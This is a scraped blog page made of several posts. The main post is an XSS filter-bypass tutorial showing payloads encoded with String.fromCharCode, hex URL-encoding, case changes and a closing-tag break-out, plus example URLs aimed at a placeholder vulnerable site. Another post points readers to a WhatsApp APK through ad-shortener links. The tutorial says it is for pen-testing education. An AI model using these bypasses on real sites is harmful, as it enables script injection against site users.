Free Licenses.Blogspot.Com

How to Activate WhatsApp call feature

<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
Whatsapp has added the calling feature for all android users. However the feature is yet not available for Iphone, Nokia, Sony and Micromax users.</div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://axeetech.com/wp-content/uploads/2015/03/gsmarena_001-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="378" src="http://axeetech.com/wp-content/uploads/2015/03/gsmarena_001-2.jpg" width="640" /></a></div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
<br /></div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
<br /></div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
</div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
You can add this feature by the following simple procedure :</div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
(1) Update the version of  Whatsapp app from Google Play(If not get the Update Download it from the Link).</div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
(2) Ask your friend, who is already enjoying the feature to call you.</div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
<br /></div>
<div style="background-color: white; margin-bottom: 15px; padding: 0px;">
<a href="http://sh.st/fvUrL" rel="nofollow" target="_blank">WhatsApp Messenger 2.11.560 Apk</a></div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://axeetech.com/wp-content/uploads/2015/02/WhatsApp-Calling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="564" src="http://axeetech.com/wp-content/uploads/2015/02/WhatsApp-Calling.png" width="640" /></a></div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
<br /></div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
<br /></div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
That is all,</div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
<br /></div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
For more help you can ask us at facebook  :</div>
<div style="background-color: white; color: #252324; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 1.8; margin-bottom: 15px; padding: 0px;">
(1) <a href="http://sh.st/fvYNC" rel="nofollow" style="color: #004276; margin: 0px; padding: 0px; text-decoration: none;" target="_blank" title="Ayaan Maqsood">Sreehari</a></div>
</div>

How to Activate WhatsApp call feature

Whatsapp has added the calling feature for all android users. However the feature is yet not available for Iphone, Nokia, Sony and Microma...

+ Read more »

New Blog for New Things

New Blog for New Things

Hey Guys, How are you... I started a new blog .Everyone kindly please visit the blog. Blog Link:- http://seurityguy.blogspot.in/ I...

+ Read more »

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing

<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<h2 style="text-align: center;">
<span style="color: red;">Bypassing the XSS Filters :<br />Advanced XSS Tutorials for Web application Pen Testing</span></h2>
<br /></div>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
Hi friends, last time, i explained what is XSS and how an attacker can inject malicious script in your site. As i promised earlier, i am writing this advanced XSS tutorial for you(still more articles will come)</span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
</div>
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
</div>
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
</div>
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxNgeVIGlsWmiE8xEw-wLpGaWS6kY52c2gnz-d-_aQyKqx16VCbLh6JmvBBo9_uS3ZvaRysdSyIrv4wMd-J37eidLau4rCU8L0jPpYXa_SyzCjXwakPO8Ax6OBSYlU8D8O8HpasR8-oXWr/s1600/XSS+Vulnerability+Tutorial+BreakTheSec.png" imageanchor="1" style="color: #888888; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxNgeVIGlsWmiE8xEw-wLpGaWS6kY52c2gnz-d-_aQyKqx16VCbLh6JmvBBo9_uS3ZvaRysdSyIrv4wMd-J37eidLau4rCU8L0jPpYXa_SyzCjXwakPO8Ax6OBSYlU8D8O8HpasR8-oXWr/s1600/XSS+Vulnerability+Tutorial+BreakTheSec.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(238, 238, 238); box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; padding: 5px; position: relative;" /></a></div>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">.</span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability.</span><br />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">For eg: if you put the <scirpt>alert("hi")</scirpt></span></div>
, the Filter will <span class="IL_AD" id="IL_AD5" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">escape</span><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"> the "(quote) character , so the script will become</span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<blockquote class="tr_bq" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
<script>alert(>xss detected<)</script></blockquote>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS.  In this case, we can use some tricks to bypass the filter.  Here i am going to cover that only. </span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<h2 style="background-color: white; color: #990000; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 11px; font-stretch: normal; margin: 0px 0px 1em; position: relative;">
1.Bypassing magic_quotes_gpc</h2>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it </span><span class="IL_AD" id="IL_AD4" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">escapes</span><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">the every ' (single-quote), " (double quote) and \  with a backslash automatically.</span><br />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">For Eg:</span><br />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"><scirpt>alert("hi");</scirpt></span> will be filtered as <script>alert(\hi\)</script>.so the script won't work now.<br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">This is well known filtering method, but we can easily bypass this filter by using ASCII characters instead.</span><br />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">For Eg:  alert("hi"); can be converted to</span><br />
<blockquote class="tr_bq" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</blockquote>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">so the script will become <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>.  In this case there is no "(quotes) or '(single quotes) or / so the filter can't filter this thing.  Yes, it will successfully run the script.</span><br />
<div class="info_box" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
String.fromCharCode() is a javascript function that converts ASCII value to Characters.</div>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<b style="background-color: white; color: #274e13; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">How to convert to ASCII values?</b><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">There are some online sites that converts to ASCII character. But i suggest you to use</span><a href="https://addons.mozilla.org/en-US/firefox/addon/hackbar/" style="background-color: white; color: #888888; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-decoration: none;">Hackbar Mozilla addon </a><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">.</span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">After installing hackbar add on ,press F9.  It will open the small box above the url bar. click the XSS->String.fromCharCode()</span><br />
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
<a href="http://1.bp.blogspot.com/-HOO_mqpXuys/TvdV-D5KW2I/AAAAAAAABHs/QHEmx1FBjgY/s1600/XSS+breaking+security.jpg" style="color: #888888; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="http://1.bp.blogspot.com/-HOO_mqpXuys/TvdV-D5KW2I/AAAAAAAABHs/QHEmx1FBjgY/s1600/XSS+breaking+security.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(238, 238, 238); box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; padding: 5px; position: relative;" /></a></div>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
<a href="http://4.bp.blogspot.com/-JqB82lpCwjQ/TvdV_l4bE7I/AAAAAAAABH0/21POwKEv2jc/s1600/XSS+bypassing+filters.jpg" style="color: #888888; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="http://4.bp.blogspot.com/-JqB82lpCwjQ/TvdV_l4bE7I/AAAAAAAABH0/21POwKEv2jc/s1600/XSS+bypassing+filters.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(238, 238, 238); box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; padding: 5px; position: relative;" /></a></div>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Now it will popup small window. enter </span><span class="IL_AD" id="IL_AD6" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">the code</span><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">for instance alert("Hi").  click ok button.  Now we got the output.</span><br />
<div class="separator" style="background-color: white; clear: both; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px; text-align: center;">
<a href="http://3.bp.blogspot.com/-9tuNcvwOvx4/TvdV7zrQlwI/AAAAAAAABHk/uzUWnsyk5ls/s1600/xss+advanced+tutorial.jpg" style="color: #888888; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="http://3.bp.blogspot.com/-9tuNcvwOvx4/TvdV7zrQlwI/AAAAAAAABHk/uzUWnsyk5ls/s1600/xss+advanced+tutorial.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(238, 238, 238); box-shadow: rgba(0, 0, 0, 0.0980392) 1px 1px 5px; box-sizing: border-box; max-width: 100%; padding: 5px; position: relative;" /></a></div>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">copy the code into the <script></script> inside and insert in the vulnerable sites</span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<i style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">For eg: </i><br />
<blockquote class="tr_bq" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script></blockquote>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<h2 style="background-color: white; color: #274e13; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 11px; font-stretch: normal; margin: 0px 0px 1em; position: relative;">
2.HEX Encoding</h2>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">we can encode our whole script into HEX code so that it can't be filtered. </span><br />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">For example:  <script>alert("Hi");</script> can be convert to HEX as:</span><br />
<blockquote class="tr_bq" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e</blockquote>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Now put the code in the vulnerable site request.</span><br />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">For ex: </span><br />
<blockquote class="tr_bq" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e</blockquote>
<b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"> Converting to HEX:</b><br />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">This site will convert to hex code: http://centricle.com/tools/ascii-hex/ </span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<h2 style="background-color: white; color: #990000; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 11px; font-stretch: normal; margin: 0px 0px 1em; position: relative;">
3.Bypassing using Obfuscation</h2>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Some website admin put the </span><i style="background-color: white; color: #cc0000; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">script</i><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">,</span><i style="background-color: white; color: #cc0000; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">alert</i><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"> in restricted word list.  so whenever you input this</span><span class="IL_AD" id="IL_AD3" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">keywords</span><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation). </span><br />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">For eg:</span><br />
<blockquote class="tr_bq" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
<script>ALeRt("hi");</script></blockquote>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">This bypass technique rarely works but giving trial is worth. </span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<h2 style="background-color: white; color: #38761d; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 11px; font-stretch: normal; margin: 0px 0px 1em; position: relative;">
4. Closing Tag</h2>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Sometimes putting "> at the beginning of the code will work. </span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<blockquote class="tr_bq" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
"><script>alert("Hi");</script></blockquote>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">This will end the previous opened tag and open our script tag.</span><br />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Example:</span><br />
<blockquote class="tr_bq" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
hxxp://vulnerable-site/search?q="><script>alert("Hi");</script></blockquote>
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<div style="background-color: white; color: #990000; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
<b>Conclusion:</b></div>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">From above article, it is clear that XSS filters alone not going to protect a site from the XSS attacks. If you really want to make your site more secure, then ask PenTesters to test </span><span class="IL_AD" id="IL_AD8" style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">your application</span><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"> or test yourself.</span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Also there are lot of different filter bypassing technique, i just covered some useful techniques for you.</span><br />
<br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" />
<div style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">
<b><span class="Apple-style-span" style="color: #cc0000;">Disclaimer:</span></b></div>
<span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">This article is intended for educational purpose only.</span></div>

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing Hi friends, last time, i explained what is XSS and...

+ Read more »

What is XSS (Cross Site Scripting)

<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4O3b3Jnto6A_4gEkMBw2Th0gH8D6BGjzWHxIhOn_CNp40pvvSTsdPP3ibW2yMHWh6XhsFZ_WOkNu4QvS4wyjupGEOJXV_yVt_uB3AOaiOo-PHNAyEY2R16O8TPB9O8K-FHU693YZIRINI/s640/cross-site-scripting-xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4O3b3Jnto6A_4gEkMBw2Th0gH8D6BGjzWHxIhOn_CNp40pvvSTsdPP3ibW2yMHWh6XhsFZ_WOkNu4QvS4wyjupGEOJXV_yVt_uB3AOaiOo-PHNAyEY2R16O8TPB9O8K-FHU693YZIRINI/s640/cross-site-scripting-xss.png" /></a></div>
<br />
<b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"><span class="Apple-style-span" style="color: #38761d;">What is XSS?</span></b><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.</span><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><span style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms. </span><b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;"> </b><br style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;" /><b style="background-color: white; color: #666666; font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 15.8400001525879px; line-height: 20.5919990539551px;">Example :</b><span style="background-color: white; color: #666666; 